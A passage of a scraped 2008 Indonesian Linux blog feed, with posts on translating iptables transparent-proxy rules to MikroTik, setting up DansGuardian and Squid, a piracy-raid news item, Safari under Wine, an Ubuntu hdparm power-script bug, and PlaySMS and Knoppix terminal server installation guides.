-t nat -A PREROUTING -i eth0 -s ! <strong>squid-box</strong> -p tcp –dport 80 -j DNAT –to <strong>squid-box</strong>:3128</li><li>iptables -t nat -A POSTROUTING -o eth0 -s <strong>local-network</strong> -d <strong>squid-box</strong> -j SNAT –to <strong>iptables-box</strong></li><li>iptables -A FORWARD -s <strong>local-network</strong> -d <strong>squid-box</strong> -i eth0 -o eth0 -p tcp –dport 3128 -j ACCEPT</li></ul> <p><span id="more-3"></span></p> <p>Spesifikasi :</p> <ul><li>Squid Box : 192.168.1.1, Mikrotik: 192.168.1.254</li><li>Mikrotik versi 2.9.27</li><li>LAN : ether1, Internet : ether2</li></ul> <p>Translasi ke mikrotik method pertama :</p> <ul><li>Pada table NAT : <ul><li>tambahkan <strong>dst-nat</strong>, <strong>src-address</strong> = <strong>!</strong>192.168.1.1 <strong>protocol</strong>=tcp <strong>dst-port</strong>=80 <strong>in-interface</strong>=ether1 <strong>action</strong>=dstnat <strong>to-addresses</strong>=192.168.1.1 <strong>to-port</strong>=3128</li><li>tambahkan <strong>src-nat</strong>,<strong> src-address</strong>=192.168.1.0/24 <strong>out-interface</strong>=ether1 <strong>action</strong>=srcnat <strong>to-addresses</strong>=192.168.1.254 <strong>to-port</strong>=0-65535</li><li>tambahkan filter rules<strong> chain</strong>=forward <strong>src-address</strong>=192.168.1.0/24 <strong>dst-address</strong>=192.168.1.1 <strong>dst-port</strong>=3128 <strong>in-interface</strong>=ether1 <strong>out-interface</strong>=ether2 <strong>action</strong>=accept</li></ul> </li></ul> <p>Method kedua :</p> <ul><li>iptables -t mangle -A PREROUTING -j ACCEPT -p tcp –dport 80 -s <strong>squid-box</strong></li><li>iptables -t mangle -A PREROUTING -j MARK –set-mark 3 -p tcp –dport 80</li><li>ip rule add fwmark 3 table 2</li><li>ip route add default via <strong>squid-box</strong> dev eth1 table 2</li><li>Next, squid-box. Use this command, which should look remarkably similar to a command we’ve seen previously.</li><li>iptables -A PREROUTING -t nat -i eth0 -p tcp –dport 80 -j REDIRECT –to-port 3128</li></ul> <p>Translasi ke mikrotik method kedua :</p> <ul><li>Pada table mangle, tambahkan <strong>chain</strong>=prerouting <strong>protocol</strong>=tcp <strong>dst-port</strong>=80 <strong>action</strong>=mark routing <strong>new routing mark</strong>=mark80</li><li>Pada table filter, tambahkan <strong>chain</strong>=forward <strong>routing mark</strong>=mark80 <strong>action</strong>=accept</li><li>Pada IP-Route, tambahkan <strong>destination</strong>=0.0.0.0/0 <strong>gateway</strong>=192.168.1.1 <strong>mark</strong>=mark80 <strong>distance</strong>=1 <strong>interface</strong>=ether1</li><li>Untuk di Squid Box silakan sesuai dengan firewall yang anda gunakan, saya menggunakan shorewall, cukup menambahkan di file /etc/shorewall/ruless -> <strong>REDIRECT local 3128 tcp www - !192.168.1.1</strong></li></ul> </div> </div><br />data sub:<br />-----------------------------------------------------------------------------------<br />http://cangkirkopi.wordpress.com/2007/07/30/redirect-mikrotik-ke-squidbox/<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-2229952050716481663?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com1tag:blogger.com,1999:blog-8559681578113508762.post-75446478068294803392008-09-11T16:15:00.000+07:002008-09-11T16:16:16.230+07:00<span style="font-size:100%;"><span style="font-family: arial;">asumsikan bahwa transparent proxy sudah berjalan normal pada Proxy Server</span></span> <p style="font-family: arial;"><span style="font-size:100%;">1. Table NAT ( IP > Firewall > NAT )</span></p> <p style="font-family: arial;"><span style="font-size:100%;"><strong>dst-nat</strong>, <strong>src-address</strong> = <strong>!</strong>192.168.0.254 <strong>protocol</strong>=tcp <strong>dst-port</strong>=80 <strong>in-interface</strong>=ether2 <strong>action</strong>=dstnat <strong>to-addresses</strong>=192.168.0.254 <strong>to-port</strong>=3128</span></p> <p style="font-family: arial;"><span style="font-size:100%;"><strong>src-nat</strong>,<strong> src-address</strong>=192.168.0.0/24 <strong>out-interface</strong>=ether2 <strong>action</strong>=srcnat <strong>to-addresses</strong>=192.168.0.1 <strong>to-port</strong>=0-65535</span></p> <p style="font-family: arial;"><span style="font-size:100%;">2. Table Filter Rules</span></p> <p style="font-family: arial;"><span style="font-size:100%;"><strong>chain</strong>=forward <strong>src-address</strong>=192.168.0.0/24 <strong>dst-address</strong>=192.168.0.254 <strong>dst-port</strong>=3128 <strong>in-interface</strong>=ether2 <strong>out-interface</strong>=ether1 <strong>action</strong>=accept</span></p> <p style="font-family: arial;"><span style="font-size:100%;">dengan script ini akhirnya transparent proxy tanpa menggunakan fitur proxy Mikrotik dapat berjalan dengan sempurna.</span></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-7544647806829480339?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-12570710029667874952008-09-11T16:07:00.001+07:002008-09-11T16:14:10.251+07:00<p>Bagi anda yang membutuhkan firewall bersama DansGuardian. Dapat menginstalasi script berikut. </p><p>Siapkan port ke Firewall. Bagian ini memang sifatnya optional, tapi sangat di sarankan. Copy perintah berikut ke file /etc/network/if-up.d/iptables-config </p> <pre>#!/bin/bash<br />iptables -F<br /># set the default policy for each of the pre-defined chains<br />iptables -P INPUT ACCEPT<br />iptables -P OUTPUT ACCEPT<br />iptables -P FORWARD DROP<br />iptables -A INPUT -i lo -j ACCEPT<br />iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT<br /># to allow incoming SSH and Proxy<br />iptables -A INPUT -p tcp --dport 22 -j ACCEPT<br />iptables -A INPUT -m state --state NEW -p tcp -m tcp -s 127.0.0.1 --dport 3128 -j ACCEPT<br />iptables -A INPUT -m state --state NEW -p tcp -m tcp --dport 8080 -j ACCEPT<br /># drop everything else<br />iptables -A INPUT -i eth+ -p udp -j DROP<br />iptables -A INPUT -i eth+ -p tcp -m tcp --syn -j DROP<br /></pre> <p>Pastikan iptables-config dapat di execute / jalankan </p> <pre># chmod +x /etc/network/if-up.d/iptables-config<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-1257071002966787495?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-62154881091091384922008-09-11T16:06:00.001+07:002008-09-11T16:12:57.874+07:00<p>Install SSH, Squid cache &amp; DansGuardian </p> <pre># apt-get install openssh-server squid dansguardian<br /><br />Konfigurasi DansGuardian </pre> <pre># vi /etc/dansguardian/dansguardian.conf<br /></pre> <p>Lakukan </p> <ul><li> Jika IP address Server adalah, 192.168.0.1. Ubah </li></ul> <pre>accessdeniedaddress = '<a href="http://yourserver.yourdomain/cgi-bin/dansguardian.pl%27" class="external free" title="http://YOURSERVER.YOURDOMAIN/cgi-bin/dansguardian.pl'" rel="nofollow">http://YOURSERVER.YOURDOMAIN/cgi-bin/dansguardian.pl'</a> </pre> <p>menjadi </p> <pre>accessdeniedaddress = '<a href="http://192.168.0.1/cgi-bin/dansguardian.pl%27" class="external free" title="http://192.168.0.1/cgi-bin/dansguardian.pl'" rel="nofollow">http://192.168.0.1/cgi-bin/dansguardian.pl'</a> </pre> <ul><li> Buang / comment kalimat "<b>UNCONFIGURED - Please remove this line after configuration</b>" setelah semua proses konfigurasi selesai. </li><li> Ubah variabel 'virusscan' menjadi off, jika anda belum menyiapkan <a href="http://opensource.telkomspeedy.com/wiki/index.php?title=ClamAV&amp;action=edit" class="new" title="ClamAV">ClamAV</a> untuk DansGuardian. Biasanya di Ubuntu, <a href="http://opensource.telkomspeedy.com/wiki/index.php?title=ClamAV&amp;action=edit" class="new" title="ClamAV">ClamAV</a> akan terinstall bersama dengan DansGuardian. </li></ul> <p>Jika anda menggunakan <a href="http://opensource.telkomspeedy.com/wiki/index.php?title=ClamAV&amp;action=edit" class="new" title="ClamAV">ClamAV</a>, pastikan <a href="http://opensource.telkomspeedy.com/wiki/index.php?title=ClamAV&amp;action=edit" class="new" title="ClamAV">ClamAV</a> meng-update database yang terbaru menggunakan perintah </p> <pre># freshclam<br /></pre> <p>Aktifkan SSH, DansGuardian, &amp; Squid cache saat startup </p> <pre># update-rc.d ssh defaults<br /># update-rc.d squid defaults<br /># update-rc.d dansguardian defaults<br /></pre> <p>Restart </p> <pre># /etc/init.d/networking restart<br /># /etc/init.d/squid restart<br /># /etc/init.d/dansguardian restart<br /></pre> <p>selesai </p> <a name="Setup_di_Sisi_Client"></a><h2><span class="editsection"></span><span class="mw-headline">Setup di Sisi Client</span></h2> <p>Pastikan proxy server di arahkan ke </p> <pre>IP address Server DansGuardian<br />Port 8080<br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-6215488109109138492?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-423995935483572432008-05-31T10:52:00.004+07:002008-09-11T16:12:25.977+07:00I dont Know about thats...<br /><br />But.. you can feel it bro...<br />If you never know about "license" or "legal license" ....<br /><br />Java was get sweeping on last many year ago, Riau next ... watching out bro...<br /><br />on newspaper "Batam Pos" :<br /><br />Polda Razia Sofware Bajakan<br />Jumat, 30 Mei 2008<br /><br />Dua Perusahaan Diperiksa<br /><br />BATAM (BP) - Business Software Alliance (BSA) bersama Polda Kepri melakukan pemeriksaan terhadap dua perusahaan ternama di Batam, terkait soal penggunaan piranti lunak (software) bajakan pada 22-23 Mei lalu. Dua perusahaan tersebut yakni PT CT yang berkedudukan di Kabil dan PT FI di Mukakuning.<br /><br />”Dari 170 unit komputer yang diperiksa di PT CT dan 200 unit di PT FI, kami menemukan sejumlah software yang tidak dilengkapi lisensi,” kata Kasat II Tipiter Polda Kepri AKBP Puja Laksana kepada wartawan di Mapolda Kepri, Batam Centre, Kamis (29/5).<br /><br />Menurut Puja, Polda Kepri sudah berkomitmen untuk memberantas penggunaan software ilegal di Batam. Itu seperti diamanatkan dalam Undang-undang nomor 19 tahun 2002 tentang Hak Cipta.<br /><br />”Polda Kepri sendiri sudah menandatangani memorandum of understanding dengan BSA, bulan Februari silam untuk menekan penggunaan perangkat lunak bajakan di wilayah hukum di Kepri,” ujarnya.<br /><br />Bagaimana dengan pembersihan software bajakan di instansi pemerintah? Puja mengatakan, penyelidikan belum mengarah ke sana.<br /><br />PT CT melalui Group Public Relation, Oka Simatupang saat dikonfirmasi, mengakui adanya pemeriksaan oleh BSA dan Polda Kepri, belum lama ini. Namun kata Oka, tidak benar kalau PT CT menggunakan 170 unit komputer dengan software bajakan.<br /><br />”Adapun hasil temuan yang ada, hanya ada tiga unit komputer yang di dalamnya terdapat program software bajakan yang dilakukan oleh tiga oknum karyawan. Artinya pihak perusahaan memang tidak pernah menempatkan software bajakan di semua komputer yang ada di PT CT,” jelasnya.<br /><br />General Affairs Manager PT CT, Naradewa menambahkan, sebelum para karyawan PT CT menerima komputer, masing-masing mereka telah dibekali surat pernyataan.<br /><br />Adapun isinya, bahwa mereka dilarang untuk mengubah atau menambah software tanpa seizin pihak perusahaan.<br /><br />”Apabila terdapat masalah di kemudian hari, setiap karyawan harus bertanggungjawab pribadi atas penyalahgunaan komputer khususnya akibat software di luar izin perusahaan,” jelasnya.<br /><br />Efek Jera<br /><br />Sementara itu, perwakilan BSA Indonesia, Donny A Sheyoputra mengaku terkejut dengan temuan Polda, di mana satu dari dua perusahaan yang tersandung kasus dugaan penggunaan software ilegal adalah perusahaan asing.<br /><br />”Penemuan ini penunjukkan belum adanya efek jera bagi pengguna piranti lunak, khususnya di perusahaan asing,” ungkap lelaki yang sering menjadi saksi ahli dalam kasus software bajakan ini.<br /><br />Seharusnya, lanjut Donny, perusahaan asing memberi contoh pada perusahaan nasional untuk menghargai hak cipta. Pelanggaran terhadap hak cipta itu, merugikan negara karena tidak membayar pajak.<br /><br />Ia menuturkan, berdasarkan laporan tahunan BSA dan International Data Centre (IDC) 2005 menunjukkan, 87 persen software yang diinstal dalam komputer di Indonesia merupakan hasil bajakan.<br /><br />”Kerugian negara kala itu sekitar Rp3,2 miliar. Di tahun 2007 meski angka kasusnya menurun, namun kerugian negara justru naik menjadi sekitar Rp3,8 miliar,” ungkapnya. (ros/amx/cr1)<br /><br />sumber : http://batampos. co.id/edisi- harian/metropoli s/polda-razia- sofware-bajakan. html<br /><br /><br />.... damned ...<br /><br />I just want tell you about free software Open Source...<br />Please.. Joint with us ...<br />atig<br />Lets do... Migration with free OS (operating system)<br />If you want migration on free software open source..<br />Lets Discuss and make workshop with me...<br /><br />ID yahoo: yudhadewa<br />Phone: ?<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-42399593548357243?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-3536829936258797582008-05-14T13:24:00.002+07:002008-05-14T13:29:30.068+07:00<p style="font-family: courier new;"><br /></p><p style="font-family: courier new;">Wanna using Safari Browser on Linux? its easy bro...<br /></p><p style="font-family: courier new;">This is a four step guide to get <a href="http://en.wikipedia.org/wiki/Safari_%28web_browser%29">Apple’s Safari browser</a> running on <a href="http://en.wikipedia.org/wiki/Linux">Linux</a>.</p> <ol style="font-family: courier new;"><li>Run winecfg, set <a href="http://en.wikipedia.org/wiki/Microsoft_Windows">Windows</a> version to <a href="http://en.wikipedia.org/wiki/Microsoft_Windows">WinXP</a></li><li>Copy the core windows fonts: cp /usr/share/fonts/truetype/msttcorefonts/{Arial,Times_New_Roman}*.ttf ~/.wine/drive_c/windows/fonts/</li><li>Download Safari for Windows from the <a href="http://www.apple.com/safari/download/">Apple homepage</a></li></ol><span style="font-family: courier new;">Or using standard command:</span><br /><span style="font-family: courier new;">root:# wine file.safari.exe</span><br /><br /><span style="font-family: courier new;">so .. you will enjoyed .... </span><br /><br /><span style="font-family: courier new;">yudhax</span><br /><br /><ol style="font-family: courier new;"><p><script type="text/javascript"><!-- google_ad_client = "pub-0149118419272697"; //120x240, created 1/13/08 google_ad_slot = "1411376746"; google_ad_width = 120; google_ad_height = 240; //--></script></p></ol><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-353682993625879758?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-54612712062338943222008-05-13T18:45:00.006+07:002008-05-13T18:58:07.255+07:00Find ubuntu bugs on laptop on mode battery [out carger],<br />get fatal script on <span style="font-weight: bold; color: rgb(255, 0, 0);">/etc/acpi/power.sh </span><br />load program <span style="font-weight: bold; color: rgb(204, 0, 0);">hdparm -B 1</span> on every block device [over maximum].<br />Thats code can make over "load cycle" on laptop machine .<br /><br />the Bug can make break off, block device like Harrdisk [or storage on active loading] will get over loading maximum, harddisk will be burn [over hot].<br /><br />Please Becarefully, if using distro ubuntu. Please using carger for save on Ubuntu perform, laptop mode (external power).<br /><br />Keep enjoy<br /><br />---- for completly ----<br /><br /><p>power.sh should be really reworked, here is why:<br />-------<wbr>------ONE-<wbr>-------<wbr>----<br />in power.sh laptop mode is enabled in this way:<br />function laptop_mode_enable {<br /> $LAPTOP_MODE start</p> <p> for x in /sys/bus/<wbr>ide/devices/<wbr>*/block; do<br /> drive=$(basename $(readlink $x));<br /> $HDPARM -S 12 /dev/$drive 2>/dev/null<br /> $HDPARM -B 1 /dev/$drive 2>/dev/null<br /> done</p> <p> for x in /sys/bus/<wbr>scsi/devices/<wbr>*/block; do<br /> drive=$(basename $(readlink $x));<br /> $HDPARM -S 12 /dev/$drive 2>/dev/null<br /> $HDPARM -B 1 /dev/$drive 2>/dev/null<br /> done<br />}<br />and disabled with a similar function.</p> <p>now, I don't know about IDE devices, but on my Dell d620, (sata, intel ich7) the hard disk and the dvd show as<br />"/sys/bus/<wbr>scsi/devices/<wbr>0:0:0:0/<wbr>block:sda" and "/sys/bus/<wbr>scsi/devices/<wbr>1:0:0:0/<wbr>block:sr0"<wbr>.</p> <p>So I think the script should be "for x in /sys/bus/<wbr>scsi/devices/<wbr>*/block*<wbr>;"<br />This has fixed the problem on my laptop.<br />This seems to affect both Edgy and Feisty.<br />-------<wbr>-----TWO-<wbr>-------<wbr>-----<br />Let laptop mode handle the disks or handle those directly?<br />As of now laptop mode provides a config file to many things that are done by acpi-support, for example controlling hd with hdparm.<br />I suggest that all those functionalities are disabled and hidden, leaving laptop mode to care only for sysctl and mount options.<br />For example as of now the user can have laptop_mode to set his hd spin down timeout to 10 seconds, but just after laptop mode power.sh sets the hd parameters itself, with a value that the uset can not customize.<br />Should be enough to cut some stuff away from the laptop_mode script and config files.<br />-------<wbr>-----THREE-<wbr>-------<wbr>---<br />Following from point two, hd parameters should be tunable by the user, and power.sh should not use "magic values". I suggest to put those somewhere else, maybe in /etc/default/<wbr>acpi-support.<br />I know those aren't strictly related to acpi, but all powersaving is already being done by acpi-support.<br />-------<wbr>----FOUR-<wbr>-------<wbr>----<br />When setting an hd aggressive power saving we should also set a longer readahead (hdparm -a 1024 or more)<br />-------<wbr>-----FIVE-<wbr>-------<wbr>-----<br />It would also be interesting to set laptop_mode and disk powersaving when the lid is closed or let the user use the functions laptop_mode_enable and laptop_mode_disable in some custom scripts.<br />For this I suggest to move those function in /usr/share/<wbr>acpi-support/<wbr>power-funcs once everything else has been taken care of.</p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-5461271206233894322?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-25253354506569672652008-05-13T07:53:00.002+07:002008-05-13T08:01:36.812+07:00<a style="font-family: courier new;" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_-_ze5jbhUuc/SCjOdz6C_NI/AAAAAAAAADM/_QWXxUqD1a8/S1600-R/k2.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://4.bp.blogspot.com/_-_ze5jbhUuc/SCjOdz6C_NI/AAAAAAAAADM/_QWXxUqD1a8/S1600-R/k2.jpg" alt="" border="0" /></a><br /><div style="text-align: center; font-family: courier new;">[ UPLOADER ] The Unix Pekanbaru Loaders ...<br /></div><br /><span style="font-family:courier new;">.NET Community unix base on Pekanbary city, For the Moderator n learn together</span><br /><span style="font-family:courier new;">SUN, MAC, BSD, Linux others..</span><br /><br /><span style="font-family:courier new;">Modulator:</span><br /><span style="font-weight: bold;font-family:courier new;" >Yudhax </span><br /><span style="font-weight: bold;font-family:courier new;" >Aedykus</span><br /><br /><span style="font-family:courier new;">For enjoy make simple life with unix community ...</span><br /><br /><span style="font-family:courier new;">you can join : </span><a style="font-family: courier new;" href="http://groups.google.co.id/group/up-loader">on millis</a><span style="font-family:courier new;"><br />[</span><a style="font-family: courier new;" href="http://groups.google.co.id/group/up-loader"> http://groups.google.co.id/group/up-loader</a><span style="font-family:courier new;"> ]</span><br /><br /><span style="font-family:courier new;">so...</span><br /><span style="font-family:courier new;">Lest going up - join<br /></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-2525335450656967265?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-2372882934930916572008-05-13T05:33:00.001+07:002008-05-13T08:03:00.298+07:00<p style="font-family:courier new;"><span class="fixed_width" style="font-size:100%;">WARNING !!!<br />———–<br />PlaySMS is not save for kids!<br />But if you’re a kid, and you can meet requirement’s below, you can use<br />PlaySMS, savely!<br />Kids must:<br />1. Not nervous when login to Linux console remotely<br />2. Able to read and understand README first, INSTALL and then FAQ in<br />this package<br />3. Able to use Yahoo! to send join PlaySMS mailing list, and ask good<br />questions<br />4. Be serious after this WARNING<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:100%;">REQUIREMENT<br />———–<br />Download PlaySMS : <a target="_blank" rel="nofollow" href="http://playsms.sourceforge.net/">http://playsms.sourceforge.net/</a><br />Download Gnokii : <a target="_blank" rel="nofollow" href="http://www.gnokii.org/">http://www.gnokii.org/</a><br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:100%;">Minimum Required Hardware<br />- Web servers hardware<br />- Disk freespace for software and data disk at least 10 MB<br />Minimum Required Software<br />- Operating System *NIX based (Linux preferred)<br />- Web Server (Apache preferred <a target="_blank" rel="nofollow" href="http://httpd.apache.org/">http://httpd.apache.org</a>)<br />- Database Server MySQL 3.23.47 or latest stable release (http://<br /><a target="_blank" rel="nofollow" href="http://www.mysql.com/">www.mysql.com</a>)<br />- PHP 4.2.2 or latest stable release with mysql module enabled and CGI<br />version<br />(<a target="_blank" rel="nofollow" href="http://www.php.net/">http://www.php.net</a>)<br />Minimum Required Server Operator (or Developer)<br />- Understand howto make sure installed PHP has MySQL module enabled<br />(phpinfo)<br />- Understand howto create/drop MySQL database<br />- Understand howto insert SQL statement into created database<br />- OK to read README, INSTALL, FAQ and other docs :)<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:100%;">Gnokii’s Installation:<br />1. Extract gnokii source package somewhere (eg: /usr/local/src)<br />2. Configure it to make sure installation path is in /usr/local<br /># ./configure –prefix=/usr/local<br />Note: if you want to change to another directory, you better<br />understand how to<br />read source of /path_to_source_of_playsms/bin/* files written in bash<br />script<br />3. Make and make install, these actions should install gnokii to /usr/<br />local<br /># make<br /># make install<br />4. Enter directory named smsd in gnokii source directory, compile and<br />install smsd<br />Note: if you use gnokii version <></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:100%;">PlaySMS Web Interface:<br />1. It is important to meet all minimum requiments above (Its a must!)<br />2. Setup a system user named ‘playsms’ to manage PlaySMS<br /># adduser playsms<br /># passwd playsms<br />Note: on some Linux distributions adduser and passwd combined<br />3. On most Linux distributions actions (2) will create system user and<br />group named playsms<br />with home directory /home/playsms, there you will install all PlaySMS<br />files<br />4. Create public_html on user’s home directory, if its not already<br />exists<br /># mkdir /home/playsms/public_html<br />5. Extract PlaySMS package somewhere (Place in /usr/local/src if you<br />want to)<br />tar -zxvf playsms-x.x.x.tar.gz<br />6. Copy ‘web’ directory to public_html directory and set owner back to<br />user playsms again<br />(for security reason)<br /># cp -rR web/* /home/playsms/public_html<br /># chown -R playsms /home/playsms/public_html<br /># chmod 701 /home/playsms<br />7. Setup database (import database)<br /># mysqladmin -u root -p create playsms<br /># mysql -u root -p playsms < /path_to_source_of_playsms/db/playsms.sql Note: you dont need to use MySQL root access nor this method to setup PlaySMS database, but this is beyond our scope, you should read MySQL manual for custom installation method 8. Edit config.php on playsms web directory (/home/playsms/public_html/ config.php) Please read and fill all fields required carefully 9. Enter bin directory and copy playsmsd and playsmsd_start to /usr/ local/bin # cd bin # cp playsmsd playsmsd_start /usr/local/bin/ 10. Enter /etc/init.d or /etc/rc.d/init.d and look for file rc.local, im sure you’ll found it. Edit that file and put “/usr/local/bin/ playsmsd_start” (without quotes) on the bottom of the file (before exit if theres exit). This way playsmsd_start will be run everytime the system startup 11 Browse <a target="_blank" rel="nofollow" href="http://localhost/%7Eplaysms">http://localhost/~playsms</a> and login using default<br />administrator user<br />username: admin<br />password: admin<br />12. At this point you should be able to logon PlaySMS webbased<br />interface.<br /></span></p><span style=";font-family:Courier,Monospaced;font-size:100%;" class="fixed_width" >NOTES<br />—–<br />1. It is VERY important to set these settings below on your php.ini<br />safe_mode = Off<br />register_globals = Off<br />magic_quotes_gpc = On<br />2. Dont forget to read FAQ and CHANGELOG carefully </span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-237288293493091657?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-62419025386238262252008-05-13T05:31:00.001+07:002008-05-13T08:04:24.932+07:00<p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Thin Client / Diskless adalah sebuah komputer yang tidak dilengkapi<br />dengan media penyimpanan (storage) antara lain : Harddisk, CDROM.<br />Namun komputer tersebut bisa melakukan booting dan memiliki sistem<br />operasi sehingga komputer tersebut bisa digunakan untuk kegiatan<br />sehari-hari. Hal tersebut bisa dilakukan hanya dengan menggunakan NIC<br />(network interface card) dan komputer yang terhubung dalam jaringan.<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Penggunaan thin client/diskless di sistem operasi linux biasanya<br />menggunakan LTSP (Linux Terminal Server Project). Namun, kali ini kita<br />akan mencoba fasilitas yang ada didalam Linux KNOPPIX yaitu KNOPPIX<br />Terminal Server.<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Dalam menggunakan KNOPPIX Terminal Server kita punya beberapa cara,<br />diantaranya :<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">1. Linux KNOPPIX diaktifkan dari CD-ROM (tanpa di install).<br />2. Linux KNOPPIX di-copy ke harddisk (booting dari disket).<br />3. Linux KNOPPIX di-install ke harddisk<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Konfigurasi KNOPPIX Terminal Server melalui CD-ROM dan harddisk<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Untuk tipe konfigurasi ini kita tidak perlu menginstall Linux Knoppix<br />ke dalam harddisk. Kita cukup melakukan booting melalui cd-rom seperti<br />layaknya kita akan menjalankan Linux Knoppix. Setelah proses boot<br />selesai langkah selanjutnya adalah :<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">* Konfigurasi network address komputer yang kita gunakan sebagai<br />server. Untuk proses ini kita bisa menggunakan perintah netcardconfig<br />atau memilih KNOPPIX->Network/Internet->Network card configuration<br />dari menu knoppix. Namun, bila ingin sedikit 'macho' anda bisa<br />mengetikan perintah ifconfig dari shell.<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">* (sesuaikan dengan konfigurasi jaringan di lingkungan anda).<br />Use DHCP Broadcast : No<br />IP Address : 10.10.11.119<br />Network Mask : 255.255.255.0<br />Broadcast Address : 10.10.11.255<br />Default gateway : 10.10.11.3<br />Name Server : 10.10.1.6<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">* Setelah konfigurasi network address selesai, selanjutnya anda<br />tinggal menggunakan perintah knoppix-terminalserver untuk<br />mengkonfigurasi Knoppix Terminal Server.<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">setup (Re)configure server and (re)start<br />available network device : eth0<br />- (nic yang ingin digunakan untuk Knoppix terminal server)<br />IP range of addresses : 10.10.11.201 10.10.11.250<br />- (disesuaikan dengan jumlah client)<br />Network modules : SIS900.o<br />- (pilih sesuai dengan NIC pada client)<br />Performance &amp; Security : secure, masq, dns<br />- (tambahkan webproxy apabila memiliki RAM diatas 256MB)<br />Start server : Yes<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Agar kita tidak lagi menggunakan cdrom dalam menggunakan Linux Knoppix<br />karena kita ingin menggunakan cdrom drive kita untuk membuka file dari<br />CD, maka kita dapat meng-copy seluruh isi cd Linux Knoppix ke dalam<br />harddisk (partisi FAT, FAT32, NTFS). Setelah itu kita harus membuat<br />bootfloppy (KNOPPIX -> utilities -> create bootfloppies for KNOPPIX)<br />untuk bisa boot kedalam Linux Knoppix yang sudah ter-copy di dalam<br />harddisk. Untuk bootfloppy dibutuhkan 2 disket.<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Instalasi Linux KNOPPIX ke harddisk dan konfigurasi KNOPPIX Terminal<br />Server.<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Diatas kita telah mengetahui bagaimana cara untuk melakukan<br />konfigurasi Knoppix terminal server tanpa menginstall Linux Knoppix<br />kedalam harddisk. Sekarang, kita akan mencoba mengkonfigurasi Knoppix<br />Terminal Server dengan kondisi Linux Knoppix sudah terinstall kedalam<br />harddisk.<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Untuk menginstall Knoppix ke dalam harddisk kita bisa menggunakan<br />perintah knx2hd (untuk knoppix 3.3 keatas) atau knx-hdinstall (untuk<br />knoppix 3.2 kebawah) kemudian ikuti langkah-langkah yang ada dilayar.<br />Setelah selesai proses instalasinya, cobalah untuk melakukan booting<br />melalui harddisk yang sudah terinstall Linux Knoppix.<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">Langkah selanjutnya untuk melakukan konfigurasi KNOPPIX Terminal<br />Server adalah sebagai berikut :<br /></span></p><p style="font-family:courier new;"><span class="fixed_width" style="font-size:85%;">1. booting dari CD Knoppix dengan option boot "knoppix 2"<br />2. kemudian copy file-file KNOPPIX ke dalam directory NFS :<br />3. cp -Rp /KNOPPIX/* /mnt/hda1/cdrom<br />- (Jika Linux Knoppix ter-install di hda1)<br />4. kemudian reboot tanpa CD Knoppix<br />5. edit /usr/share/knoppix-terminalserver/templates/miniroot/linuxrc<br />- dari baris ke 242 - 252 adalah sebagai berikut :<br /># if we have an NFSDIR, try mounting it<br />if [ -n 